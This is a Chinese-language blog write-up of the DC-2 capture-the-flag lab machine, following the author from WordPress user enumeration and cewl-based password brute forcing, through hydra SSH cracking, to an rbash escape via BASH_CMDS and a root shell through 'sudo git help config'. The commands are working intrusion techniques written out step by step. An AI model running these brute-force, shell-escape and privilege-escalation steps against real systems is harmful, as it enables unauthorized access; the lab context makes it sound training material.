DC-2靶机学习

1.打开是一个wordpress的主题


想到可以用wpsacn先扫描一波

root@kali:~# wpscan --url http://dc-2


无果,枚举一下用户看看

root@kali:~# wpscan --url http://dc-2 -e u


就三个用户,admin,tom,jerry
随手整了个top500字典爆破三个账户,无果

2. cewl的提示

实在没头绪就看了下提示,说是用 cewl
搜了下 cewl是个生成字典的工具
详见https://www.freebuf.com/articles/network/190128.html

root@kali:~# cewl dc-2 > dc-2.txt

爬取网站生成字典

再拿去爆破

root@kali:~# wpscan --url http://dc-2 --passwords /root/dc-2.txt --usernames /root/username.txt 


破解出来了,赶紧登陆试试

但是这两个账户只是普通账户,还要提升权限

3.flag2的提示


没看懂啥意思,换个账号登陆下康康
tom账号啥都没有,叹气
到后台,我觉得可能是后台getshell
但是普通用户没有上传权限,这就很难受
https://www.cnblogs.com/ssw6/p/12668000.html
这是一点后台提权的总结

4.柳暗花明

整到这里忽然想起来之前扫描的时候靶机还有个ssh端口是开着的

root@kali:~# nmap -A -p- -Pn 192.168.2.130


或许有ssh弱口令也说不定
我用的是hydra破解密码

root@kali:~# hydra -L /root/username.txt -P /root/dc-2.txt -t 6 -s 7744 ssh://192.168.2.130


运气不错,emmmm,只是这个密码和之前登陆后台的密码一样,23333

5.rbash


利用hydra破解的ssh密码,登陆发现似乎又是一个死胡同,无法执行有效的命令

这里有个flag3.txt,看不到,悲伤(绕沙盒的感觉)
摸了半天,无意中试出来个vi命令,好像可以打开文本文件,23333

vi flag3.txt


这话没看明白,猫和老鼠里面的tom和jerry吗?
问题还是归结到rbash上去
翻了很久终于找到一篇文章
https://www.cnblogs.com/xiaoxiaoleo/p/8450379.html
另外一篇是讲绕过的手段的
https://www.freebuf.com/articles/system/188989.html

很奇妙的说,直接就使得path和shell可写了

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash

然后再

tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin


可以看到这里PATH已经导入了系统命令
尝试一下系统命令

tom@DC-2:~$ whoami
tom
tom@DC-2:~$ ls -lah
total 48K
drwxr-x--- 3 tom  tom  4.0K May  9 17:43 .
drwxr-xr-x 4 root root 4.0K Mar 21  2019 ..
-rwxr-x--- 1 tom  tom    66 Mar 21  2019 .bash_history
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bash_login
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bash_logout
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bash_profile
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bashrc
-rwxr-x--- 1 tom  tom    95 Mar 21  2019 flag3.txt
-rw------- 1 tom  tom    49 May  9 17:42 .lesshst
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .profile
drwxr-x--- 3 tom  tom  4.0K Mar 21  2019 usr
-rw------- 1 tom  tom    50 May  9 17:25 .Xauthority

成功逃逸沙盒,害为啥我就想不到呢

6.提权root

这里卡了好久,跑去翻wp去了,意料之外的是jerry这一步
在命令行下切换用户,真的NP

jerry@DC-2:~$ cat flag4.txt 
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

jerry@DC-2:~$ 

这里有提示git提权
提权指导:https://www.cnblogs.com/zaqzzz/p/12075132.html
这一步很轻松

jerry@DC-2:~$ sudo git help config
然后输入
!/bin/bash或者!'sh'完成提权


我特么吹爆,太强了(然而我还是太菜了)

posted @ 2020-05-09 22:39  Mke2fs  阅读(501)  评论(0编辑  收藏  举报